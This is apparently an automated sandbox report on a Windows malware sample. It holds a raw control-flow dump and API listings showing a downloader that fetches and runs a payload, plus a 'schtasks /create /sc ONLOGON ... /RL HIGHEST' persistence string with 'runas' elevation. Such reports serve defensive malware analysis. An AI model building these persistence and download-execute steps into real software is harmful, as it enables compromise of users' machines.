c862cf 10874->10876 10875->10873 10877 c85540 8 API calls 10875->10877 10878 c862ee 10876->10878 10879 c862d6 10876->10879 10877->10875 10882 c862fd SetFilePointer 10878->10882 10884 c86316 10878->10884 10888 c86356 10878->10888 10880 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10879->10880 10881 c862e8 10880->10881 10881->10723 10882->10884 10883 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10885 c86371 10883->10885 10886 c84f30 6 API calls 10884->10886 10885->10723 10887 c8634b 10886->10887 10887->10888 10889 c86377 MultiByteToWideChar 10887->10889 10888->10883 10890 c863a6 10889->10890 10891 c86535 SystemTimeToFileTime LocalFileTimeToFileTime 10890->10891 10893 c8663e 10891->10893 10892 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 10894 c8680d 10892->10894 10893->10892 10894->10723 10896 c86f68 10895->10896 10897 c86f69 IsProcessorFeaturePresent 10895->10897 10896->10702 10899 c86fb2 10897->10899 11704 c86f73 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10899->11704 10901 c87095 10901->10702 10906 c87177 10902->10906 10904 c87191 10904->10770 10906->10904 10908 c87193 10906->10908 10942 c8c57b 10906->10942 10945 c8c546 10906->10945 10907 c874f5 10909 c88720 CallUnexpected RaiseException 10907->10909 10908->10907 10952 c88720 10908->10952 10910 c87512 10909->10910 10910->10770 10913 c85376 __CreateFrameInfo 10912->10913 10921 c8551d 10912->10921 11060 c85180 10913->11060 10915 c85393 10916 c8550e 10915->10916 10917 c853c2 10915->10917 10919 c853ad SetFilePointer 10915->10919 10918 c85514 CloseHandle 10916->10918 10916->10921 11075 c850e0 10917->11075 10918->10921 10919->10917 10921->10777 10925 c85080 6 API calls 10926 c853f9 10925->10926 10926->10916 10927 c85080 6 API calls 10926->10927 10928 c8540e 10927->10928 10928->10916 10929 c85080 6 API calls 10928->10929 10930 c85423 10929->10930 10930->10916 10931 c850e0 6 API calls 10930->10931 10932 c85458 10931->10932 
10932->10916 10933 c850e0 6 API calls 10932->10933 10934 c8546a 10933->10934 10934->10916 10935 c85080 6 API calls 10934->10935 10936 c8547f 10935->10936 10936->10916 10937 c85499 10936->10937 10938 c8c546 ___std_exception_copy 15 API calls 10937->10938 10939 c854c7 10938->10939 11089 c85540 10939->11089 10941 c854fa 10941->10777 10955 c8c5a7 10942->10955 10950 c8dc7f _unexpected 10945->10950 10946 c8dcbd 10966 c8dc32 10946->10966 10947 c8dca8 RtlAllocateHeap 10949 c8dcbb 10947->10949 10947->10950 10949->10906 10950->10946 10950->10947 10951 c8c57b _unexpected 2 API calls 10950->10951 10951->10950 10953 c8873a 10952->10953 10954 c88767 RaiseException 10952->10954 10953->10954 10954->10907 10956 c8c5b3 ___scrt_is_nonwritable_in_current_image 10955->10956 10961 c8f599 EnterCriticalSection 10956->10961 10958 c8c5be __CreateFrameInfo 10962 c8c5f5 10958->10962 10961->10958 10965 c8f5e1 LeaveCriticalSection 10962->10965 10964 c8c586 10964->10906 10965->10964 10969 c8f1cc GetLastError 10966->10969 10968 c8dc37 10968->10949 10970 c8f1e8 10969->10970 10971 c8f1e2 10969->10971 10975 c8f1ec SetLastError 10970->10975 10997 c91430 10970->10997 10992 c913f1 10971->10992 10975->10968 10978 c8f219 10979 c8f221 10978->10979 10980 c8f232 10978->10980 10982 c91430 _unexpected 6 API calls 10979->10982 10981 c91430 _unexpected 6 API calls 10980->10981 10983 c8f23e 10981->10983 10984 c8f22f 10982->10984 10985 c8f259 10983->10985 10986 c8f242 10983->10986 11009 c8dc45 10984->11009 11015 c8eea9 10985->11015 10987 c91430 _unexpected 6 API calls 10986->10987 10987->10984 10991 c8dc45 __freea 12 API calls 10991->10975 11020 c912ae 10992->11020 10994 c9140d 10995 c91428 TlsGetValue 10994->10995 10996 c91416 10994->10996 10996->10970 10998 c912ae _unexpected 5 API calls 10997->10998 10999 c9144c 10998->10999 11000 c9146a TlsSetValue 10999->11000 11001 c8f204 10999->11001 11001->10975 11002 c8d8f2 11001->11002 11007 c8d8ff _unexpected 11002->11007 11003 c8d93f 11006 c8dc32 __floor_pentium4 13 
API calls 11003->11006 11004 c8d92a HeapAlloc 11005 c8d93d 11004->11005 11004->11007 11005->10978 11006->11005 11007->11003 11007->11004 11008 c8c57b _unexpected 2 API calls 11007->11008 11008->11007 11010 c8dc50 RtlFreeHeap 11009->11010 11014 c8dc7a 11009->11014 11011 c8dc65 GetLastError 11010->11011 11010->11014 11012 c8dc72 __freea 11011->11012 11013 c8dc32 __floor_pentium4 12 API calls 11012->11013 11013->11014 11014->10975 11034 c8ed3d 11015->11034 11021 c912de 11020->11021 11025 c912da _unexpected 11020->11025 11021->11025 11026 c911e3 11021->11026 11024 c912f8 GetProcAddress 11024->11025 11025->10994 11032 c911f4 ___vcrt_FlsFree 11026->11032 11027 c9128a 11027->11024 11027->11025 11028 c91212 LoadLibraryExW 11029 c9122d GetLastError 11028->11029 11030 c91291 11028->11030 11029->11032 11030->11027 11031 c912a3 FreeLibrary 11030->11031 11031->11027 11032->11027 11032->11028 11033 c91260 LoadLibraryExW 11032->11033 11033->11030 11033->11032 11035 c8ed49 ___scrt_is_nonwritable_in_current_image 11034->11035 11048 c8f599 EnterCriticalSection 11035->11048 11037 c8ed53 11049 c8ed83 11037->11049 11040 c8ee4f 11041 c8ee5b ___scrt_is_nonwritable_in_current_image 11040->11041 11052 c8f599 EnterCriticalSection 11041->11052 11043 c8ee65 11053 c8f030 11043->11053 11045 c8ee7d 11057 c8ee9d 11045->11057 11048->11037 11050 c8f5e1 __CreateFrameInfo LeaveCriticalSection 11049->11050 11051 c8ed71 11050->11051 11051->11040 11052->11043 11054 c8f066 _unexpected 11053->11054 11055 c8f03f _unexpected 11053->11055 11054->11045 11055->11054 11056 c90e92 _unexpected 14 API calls 11055->11056 11056->11054 11058 c8f5e1 __CreateFrameInfo LeaveCriticalSection 11057->11058 11059 c8ee8b 11058->11059 11059->10991 11064 c851a6 11060->11064 11061 c85212 11062 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11061->11062 11063 c85222 11062->11063 11063->10915 11064->11061 11065 c8c546 ___std_exception_copy 15 API calls 11064->11065 11066 c85206 11065->11066 11066->11061 11074 c85226 
__InternalCxxFrameHandler 11066->11074 11067 c85339 11146 c8c52b 11067->11146 11070 c8527a SetFilePointer 11070->11074 11071 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11073 c85352 11071->11073 11072 c8529f ReadFile 11072->11074 11073->10915 11074->11067 11074->11070 11074->11072 11149 c84fd0 11075->11149 11077 c850f9 11078 c84fd0 6 API calls 11077->11078 11082 c8510f 11077->11082 11078->11082 11079 c84fd0 6 API calls 11080 c8512a 11079->11080 11081 c85143 11080->11081 11083 c84fd0 6 API calls 11080->11083 11081->10916 11084 c85080 11081->11084 11082->11079 11082->11080 11083->11081 11085 c84fd0 6 API calls 11084->11085 11086 c85095 11085->11086 11087 c850ab 11086->11087 11088 c84fd0 6 API calls 11086->11088 11087->10916 11087->10925 11088->11087 11090 c8555e 11089->11090 11091 c85554 11089->11091 11092 c85586 11090->11092 11093 c85571 SetFilePointer 11090->11093 11094 c85593 11090->11094 11091->10941 11095 c850e0 6 API calls 11092->11095 11093->11092 11096 c84fd0 6 API calls 11094->11096 11095->11094 11097 c855b7 11096->11097 11098 c855cb 11097->11098 11099 c84fd0 6 API calls 11097->11099 11100 c84fd0 6 API calls 11098->11100 11099->11098 11101 c855f3 11100->11101 11102 c85607 11101->11102 11103 c84fd0 6 API calls 11101->11103 11104 c84fd0 6 API calls 11102->11104 11103->11102 11105 c8562f 11104->11105 11106 c85643 11105->11106 11107 c84fd0 6 API calls 11105->11107 11108 c84fd0 6 API calls 11106->11108 11107->11106 11109 c8566b 11108->11109 11110 c8567f 11109->11110 11111 c84fd0 6 API calls 11109->11111 11112 c850e0 6 API calls 11110->11112 11111->11110 11113 c856a5 11112->11113 11114 c850e0 6 API calls 11113->11114 11115 c856fd 11114->11115 11116 c850e0 6 API calls 11115->11116 11117 c8570c 11116->11117 11118 c850e0 6 API calls 11117->11118 11119 c8571b 11118->11119 11120 c84fd0 6 API calls 11119->11120 11121 c8572c 11120->11121 11122 c85740 11121->11122 11123 c84fd0 6 API calls 11121->11123 11124 c84fd0 6 API calls 11122->11124 11123->11122 
11125 c85768 11124->11125 11126 c8577c 11125->11126 11127 c84fd0 6 API calls 11125->11127 11128 c84fd0 6 API calls 11126->11128 11127->11126 11129 c857a4 11128->11129 11130 c857b8 11129->11130 11131 c84fd0 6 API calls 11129->11131 11132 c84fd0 6 API calls 11130->11132 11131->11130 11133 c857e0 11132->11133 11134 c84fd0 6 API calls 11133->11134 11136 c857f4 11133->11136 11134->11136 11135 c84fd0 6 API calls 11137 c8581c 11135->11137 11136->11135 11138 c85830 11137->11138 11139 c84fd0 6 API calls 11137->11139 11140 c850e0 6 API calls 11138->11140 11139->11138 11141 c85856 11140->11141 11142 c850e0 6 API calls 11141->11142 11144 c8586a 11142->11144 11143 c8586e 11143->10941 11144->11143 11158 c84f30 11144->11158 11147 c8dc45 __freea 14 API calls 11146->11147 11148 c8533f 11147->11148 11148->11071 11150 c84ff4 ReadFile 11149->11150 11152 c8500c __InternalCxxFrameHandler 11149->11152 11150->11152 11151 c85047 11153 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11151->11153 11152->11151 11154 c8506b 11152->11154 11155 c8505c 11153->11155 11156 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11154->11156 11155->11077 11157 c8507b 11156->11157 11157->11077 11159 c84f5b ReadFile 11158->11159 11160 c84f8c __InternalCxxFrameHandler 11158->11160 11161 c84f70 11159->11161 11164 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11160->11164 11162 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11161->11162 11163 c84f88 11162->11163 11163->11143 11165 c84fc6 11164->11165 11165->11143 11171 c868d1 __InternalCxxFrameHandler 11166->11171 11172 c86851 11166->11172 11167 c869c1 11168 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11167->11168 11169 c869cd 11168->11169 11169->10817 11170 c868b0 GetFileAttributesW 11170->11171 11173 c868c2 CreateDirectoryW 11170->11173 11171->11167 11174 c869d1 11171->11174 11177 c86926 11171->11177 11178 c8693d 11171->11178 11172->11170 11172->11174 11175 c868a6 11172->11175 
11173->11171 11176 c87097 5 API calls 11174->11176 11175->11170 11185 c869d6 11176->11185 11179 c86830 57 API calls 11177->11179 11180 c86997 GetFileAttributesW 11178->11180 11179->11178 11180->11167 11182 c869b2 CreateDirectoryW 11180->11182 11181 c86a44 11183 c86a7d 11181->11183 11184 c86a65 11181->11184 11182->11167 11189 c86a86 11183->11189 11195 c86ab8 11183->11195 11186 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11184->11186 11185->11181 11190 c86a20 11185->11190 11194 c8c52b ___std_exception_copy 14 API calls 11185->11194 11188 c86a77 11186->11188 11187 c86b13 11192 c86120 27 API calls 11187->11192 11188->10817 11193 c85540 8 API calls 11189->11193 11191 c86a37 11190->11191 11196 c847e0 14 API calls 11190->11196 11197 c8c52b ___std_exception_copy 14 API calls 11191->11197 11198 c86b22 11192->11198 11199 c86aa8 11193->11199 11194->11190 11195->11187 11195->11199 11196->11191 11197->11181 11202 c86b32 11198->11202 11204 c86b6e 11198->11204 11199->11195 11200 c85540 8 API calls 11199->11200 11200->11199 11201 c86830 57 API calls 11203 c86b59 11201->11203 11202->11201 11208 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11203->11208 11205 c86bb7 11204->11205 11206 c86dc4 11204->11206 11207 c86bd4 11204->11207 11211 c827b0 45 API calls 11205->11211 11212 c87097 5 API calls 11206->11212 11207->11205 11209 c86c25 11207->11209 11210 c86b68 11208->11210 11215 c827b0 45 API calls 11209->11215 11210->10817 11213 c86c20 11211->11213 11214 c86dc9 11212->11214 11216 c86830 57 API calls 11213->11216 11215->11213 11217 c86c50 CreateFileW 11216->11217 11218 c86c7b 11217->11218 11219 c86c93 11217->11219 11221 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11218->11221 11220 c85b70 22 API calls 11219->11220 11225 c86ca0 11220->11225 11222 c86c8d 11221->11222 11222->10817 11223 c85d40 7 API calls 11223->11225 11224 c86d65 11227 c86da1 CloseHandle 11224->11227 11228 c86d73 SetFileTime CloseHandle 11224->11228 11225->11223 11226 
c86ce9 WriteFile 11225->11226 11229 c86d15 11225->11229 11226->11225 11226->11229 11230 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11227->11230 11228->11227 11229->11224 11231 c86d41 11229->11231 11233 c8c52b ___std_exception_copy 14 API calls 11229->11233 11232 c86dbe 11230->11232 11234 c86d58 11231->11234 11235 c847e0 14 API calls 11231->11235 11232->10817 11233->11231 11236 c8c52b ___std_exception_copy 14 API calls 11234->11236 11235->11234 11236->11224 11238 c85d2a 11237->11238 11239 c85b84 11237->11239 11238->10824 11239->11238 11240 c85b99 11239->11240 11333 c860b0 11239->11333 11297 c85910 11240->11297 11243 c85bab 11244 c85bb2 11243->11244 11245 c8c546 ___std_exception_copy 15 API calls 11243->11245 11244->10824 11246 c85bc8 11245->11246 11247 c85bfd 11246->11247 11248 c8c546 ___std_exception_copy 15 API calls 11246->11248 11247->10824 11249 c85bdb 11248->11249 11250 c85c0c 11249->11250 11251 c85bf7 11249->11251 11254 c85c59 11250->11254 11342 c848b0 11250->11342 11252 c8c52b ___std_exception_copy 14 API calls 11251->11252 11252->11247 11254->10824 11256 c85d69 11255->11256 11257 c86098 11256->11257 11258 c85d7f 11256->11258 11259 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11257->11259 11260 c85d99 11258->11260 11261 c85d83 11258->11261 11262 c860aa 11259->11262 11264 c85da0 11260->11264 11281 c85db1 __InternalCxxFrameHandler 11260->11281 11263 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11261->11263 11262->10824 11265 c85d95 11263->11265 11266 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11264->11266 11265->10824 11267 c85dad 11266->11267 11267->10824 11268 c8607b 11269 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11268->11269 11270 c86094 11269->11270 11270->10824 11271 c8603a 11276 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11271->11276 11272 c85e0f SetFilePointer 11272->11281 11273 c8604e 11277 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 
API calls 11273->11277 11275 c85e34 ReadFile 11278 c85e4a 11275->11278 11279 c8604a 11276->11279 11280 c86060 11277->11280 11278->11281 11279->10824 11280->10824 11281->11268 11281->11271 11281->11272 11281->11273 11281->11275 11282 c86064 11281->11282 11283 c86068 11281->11283 11358 c84b40 11281->11358 11282->11268 11282->11283 11284 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11283->11284 11285 c86077 11284->11285 11285->10824 11287 c847ec 11286->11287 11288 c84882 11286->11288 11287->11288 11366 c847d0 11287->11366 11288->10791 11291 c827cd 11290->11291 11369 c8c4ea 11291->11369 11699 c870a3 IsProcessorFeaturePresent 11294->11699 11298 c8593a 11297->11298 11299 c8595c 11297->11299 11300 c85940 SetFilePointer 11298->11300 11301 c85953 11298->11301 11302 c850e0 6 API calls 11299->11302 11300->11299 11301->11243 11303 c85969 11302->11303 11305 c84fd0 6 API calls 11303->11305 11306 c8598e 11305->11306 11307 c8599c 11306->11307 11308 c84fd0 6 API calls 11306->11308 11309 c84fd0 6 API calls 11307->11309 11308->11307 11310 c859b2 11309->11310 11311 c859c4 11310->11311 11313 c84fd0 6 API calls 11310->11313 11312 c84fd0 6 API calls 11311->11312 11314 c859e2 11312->11314 11313->11311 11315 c84fd0 6 API calls 11314->11315 11318 c859f7 11314->11318 11315->11318 11316 c850e0 6 API calls 11317 c85a40 11316->11317 11319 c850e0 6 API calls 11317->11319 11318->11316 11320 c85a54 11319->11320 11321 c850e0 6 API calls 11320->11321 11322 c85a7e 11321->11322 11323 c850e0 6 API calls 11322->11323 11324 c85aa8 11323->11324 11325 c84fd0 6 API calls 11324->11325 11326 c85ad4 11325->11326 11327 c84fd0 6 API calls 11326->11327 11328 c85ae8 11326->11328 11327->11328 11329 c84fd0 6 API calls 11328->11329 11330 c85b20 11329->11330 11331 c85b35 11330->11331 11332 c84fd0 6 API calls 11330->11332 11331->11243 11332->11331 11334 c86115 11333->11334 11335 c860bb 11333->11335 11334->11240 11335->11334 11336 c860e1 11335->11336 11337 c8c52b ___std_exception_copy 14 API calls 
11335->11337 11338 c860f8 11336->11338 11339 c847e0 14 API calls 11336->11339 11337->11336 11340 c8c52b ___std_exception_copy 14 API calls 11338->11340 11339->11338 11341 c86105 11340->11341 11341->11240 11343 c848b7 11342->11343 11350 c848bc __CreateFrameInfo 11342->11350 11343->11254 11344 c8490f 11344->11254 11345 c849af 11346 c847e0 14 API calls 11345->11346 11347 c84a2b 11346->11347 11347->11254 11348 c849a4 11348->11345 11349 c8c52b ___std_exception_copy 14 API calls 11348->11349 11349->11345 11350->11344 11350->11345 11350->11348 11351 c849dc 11350->11351 11352 c84a34 11350->11352 11351->11348 11353 c8c52b ___std_exception_copy 14 API calls 11351->11353 11354 c84ac7 11352->11354 11355 c8c52b ___std_exception_copy 14 API calls 11352->11355 11356 c84aed 11352->11356 11353->11348 11354->11356 11357 c8c52b ___std_exception_copy 14 API calls 11354->11357 11355->11354 11356->11254 11357->11356 11359 c84dd9 11358->11359 11361 c84b51 11358->11361 11359->11281 11361->11359 11362 c82fb0 11361->11362 11364 c82fe5 __InternalCxxFrameHandler 11362->11364 11363 c83c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11363->11364 11364->11363 11365 c83996 11364->11365 11365->11361 11367 c8c52b ___std_exception_copy 14 API calls 11366->11367 11368 c847db 11367->11368 11368->11288 11370 c8c4fe ___std_exception_copy 11369->11370 11375 c8a27b 11370->11375 11376 c8a2ca 11375->11376 11377 c8a2a7 11375->11377 11376->11377 11380 c8a2d2 11376->11380 11392 c8daf7 11377->11392 11379 c8a2bf 11381 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11379->11381 11401 c8b736 11380->11401 11382 c8a3fc 11381->11382 11386 c8b4a0 11382->11386 11387 c8b4ac 11386->11387 11388 c8b4c3 11387->11388 11389 c8b660 ___std_exception_copy 41 API calls 11387->11389 11390 c827d7 11388->11390 11391 c8b660 ___std_exception_copy 41 API calls 11388->11391 11389->11388 11390->10813 11391->11390 11393 c8db0e 11392->11393 11394 c8db07 
11392->11394 11397 c8db1c 11393->11397 11418 c8d94f 11393->11418 11414 c8b610 GetLastError 11394->11414 11397->11379 11398 c8db43 11398->11397 11421 c8db84 IsProcessorFeaturePresent 11398->11421 11400 c8db73 11453 c8c426 11401->11453 11404 c8b756 11405 c8daf7 ___std_exception_copy 29 API calls 11404->11405 11407 c8a353 11405->11407 11406 c8b77d 11406->11407 11457 c8b6bc 11406->11457 11460 c8b972 11406->11460 11501 c8bafc 11406->11501 11411 c8b4dc 11407->11411 11412 c8dc45 __freea 14 API calls 11411->11412 11413 c8b4ec 11412->11413 11413->11379 11415 c8b629 11414->11415 11425 c8f27d 11415->11425 11419 c8d95a GetLastError SetLastError 11418->11419 11420 c8d973 11418->11420 11419->11398 11420->11398 11422 c8db90 11421->11422 11447 c8d978 11422->11447 11426 c8f296 11425->11426 11427 c8f290 11425->11427 11428 c91430 _unexpected 6 API calls 11426->11428 11431 c8b645 SetLastError 11426->11431 11429 c913f1 _unexpected 6 API calls 11427->11429 11430 c8f2b0 11428->11430 11429->11426 11430->11431 11432 c8d8f2 _unexpected 14 API calls 11430->11432 11431->11393 11433 c8f2c0 11432->11433 11434 c8f2c8 11433->11434 11435 c8f2dd 11433->11435 11436 c91430 _unexpected 6 API calls 11434->11436 11437 c91430 _unexpected 6 API calls 11435->11437 11438 c8f2d4 11436->11438 11439 c8f2e9 11437->11439 11444 c8dc45 __freea 14 API calls 11438->11444 11440 c8f2fc 11439->11440 11441 c8f2ed 11439->11441 11443 c8eea9 _unexpected 14 API calls 11440->11443 11442 c91430 _unexpected 6 API calls 11441->11442 11442->11438 11445 c8f307 11443->11445 11444->11431 11446 c8dc45 __freea 14 API calls 11445->11446 11446->11431 11448 c8d994 __CreateFrameInfo 11447->11448 11449 c8d9c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11448->11449 11452 c8da91 __CreateFrameInfo 11449->11452 11450 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11451 c8daaf GetCurrentProcess TerminateProcess 11450->11451 11451->11400 11452->11450 11454 c8b74b 11453->11454 11455 c8c431 11453->11455 
11454->11404 11454->11406 11454->11407 11456 c8daf7 ___std_exception_copy 29 API calls 11455->11456 11456->11454 11537 c8a5b4 11457->11537 11459 c8b6f9 11459->11406 11461 c8b998 11460->11461 11462 c8b980 11460->11462 11465 c8daf7 ___std_exception_copy 29 API calls 11461->11465 11482 c8b9d9 11461->11482 11463 c8bb2a 11462->11463 11464 c8bb94 11462->11464 11462->11482 11469 c8bbbc 11463->11469 11470 c8bb30 11463->11470 11467 c8bb99 11464->11467 11468 c8bbd3 11464->11468 11466 c8b9cd 11465->11466 11466->11406 11471 c8bbca 11467->11471 11472 c8bb9b 11467->11472 11473 c8bbd8 11468->11473 11474 c8bbf2 11468->11474 11587 c8ad37 11469->11587 11475 c8bb61 11470->11475 11476 c8bb35 11470->11476 11594 c8c27b 11471->11594 11489 c8bbaa 11472->11489 11490 c8bb43 11472->11490 11478 c8bbe9 11473->11478 11479 c8bbdd 11473->11479 11602 c8c298 11474->11602 11481 c8bb3b 11475->11481 11486 c8bb89 11475->11486 11476->11478 11476->11481 11598 c8c2ae 11478->11598 11479->11469 11479->11486 11487 c8bb6e 11481->11487 11481->11490 11497 c8bb5c 11481->11497 11482->11406 11499 c8bbfd 11486->11499 11576 c8aec9 11486->11576 11487->11499 11570 c8c14e 11487->11570 11489->11469 11492 c8bbae 11489->11492 11490->11499 11560 c8bfa7 11490->11560 11492->11499 11583 c8c1f6 11492->11583 11493 c86f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11494 c8beee 11493->11494 11494->11406 11497->11499 11500 c8bddd 11497->11500 11605 c8c3b0 11497->11605 11499->11493 11500->11499 11612 c8ea92 11500->11612 11502 c8bb2a 11501->11502 11503 c8bb94 11501->11503 11506 c8bbbc 11502->11506 11507 c8bb30 11502->11507 11504 c8bb99 11503->11504 11505 c8bbd3 11503->11505 11508 c8bbca 11504->11508 11509 c8bb9b 11504->11509 11510 c8bbd8 11505->11510 11511 c8bbf2 11505->11511 11520 c8ad37 30 API calls 11506->11520 11512 c8bb61 11507->11512 11513 c8bb35 11507->11513 11514 c8c27b 30 API calls 11508->11514 11515 c8bb43 11509->11515 11525 c8bbaa 11509->11525 11516 c8bbe9 11510->11516 11517 c8bbdd 11510->11517 11518 c8c298 30 

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00C81E2D
                                                        • lstrlenW.KERNEL32(00000000), ref: 00C81E34
                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 00C81E46
                                                        • RegCloseKey.ADVAPI32(?), ref: 00C81E4F
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A,771AF380,00000000,00000000), ref: 00C81E73
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81E76
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00C81E88
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C81EA3
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81EA6
                                                        • wsprintfW.USER32 ref: 00C8204E
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C8205E
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C82061
                                                        • wsprintfW.USER32 ref: 00C82449
                                                        • ShellExecuteW.SHELL32(00000000,runas,?,?,00000000,00000000), ref: 00C8246A
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C82478
                                                        • HeapFree.KERNEL32(00000000), ref: 00C8247B
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C82480
                                                        • HeapFree.KERNEL32(00000000), ref: 00C82483
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C8248D
                                                        • HeapFree.KERNEL32(00000000), ref: 00C82490
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree$wsprintf$CloseDirectoryExecuteOpenShellSystemValuelstrlen
                                                        • String ID: "$#$#$$$$$%$%s\schtasks.exe$/c "%s"$/create /sc ONLOGON /tn "%s" /tr "%s" /RL HIGHEST$;$>$?$?$C$I$L$L$L$L$L$L$N$N$b$b$cmd.exe$i$invalid distance code$invalid literal/length code$l$need dictionary$p$runas$y$z
                                                        • API String ID: 2564131513-3794329617
                                                        • Opcode ID: 85d8e7683398652a5c1f9c6c945f4ff55aad10e324f980d5cb7228b9f28cc282
                                                        • Instruction ID: 0be064584e55fbdad786df052a26b5dceeb6ab8b6e7e39911623bb35120697dd
                                                        • Opcode Fuzzy Hash: 85d8e7683398652a5c1f9c6c945f4ff55aad10e324f980d5cb7228b9f28cc282
                                                        • Instruction Fuzzy Hash: C142D928810269D9CB20EFA1A8087FEB6F0FF3D715F41505BE588EB560F7B84985DB19

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00C81460
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81463
                                                        • Sleep.KERNEL32(000003E8), ref: 00C814AD
                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104), ref: 00C814E3
                                                        • SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000), ref: 00C814EE
                                                        • SetFileAttributesW.KERNEL32(00000000,00000002), ref: 00C81506
                                                        • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00C815B9
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C815BC
                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 00C815D6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C8160E
                                                        • HeapFree.KERNEL32(00000000), ref: 00C81611
                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00C81760
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00C81767
                                                        • GetCurrentProcess.KERNEL32(00000008,?), ref: 00C81786
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C8178D
                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00C817B0
                                                        • CloseHandle.KERNEL32(?), ref: 00C817C2
                                                          • Part of subcall function 00C825B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
                                                          • Part of subcall function 00C825B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
                                                          • Part of subcall function 00C825B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
                                                          • Part of subcall function 00C825B0: HeapAlloc.KERNEL32(00000000), ref: 00C8265D
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 00C826AA
                                                          • Part of subcall function 00C825B0: RtlAllocateHeap.NTDLL(00000000), ref: 00C826AD
                                                          • Part of subcall function 00C825B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C826D7
                                                          • Part of subcall function 00C825B0: RtlFreeHeap.NTDLL(00000000), ref: 00C826DA
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826E6
                                                          • Part of subcall function 00C825B0: InternetCloseHandle.WININET(?), ref: 00C826F3
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?), ref: 00C8181B
                                                        • CloseHandle.KERNEL32(?), ref: 00C81831
                                                        • CloseHandle.KERNEL32(?), ref: 00C81839
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C8183E
                                                        • HeapFree.KERNEL32(00000000), ref: 00C81841
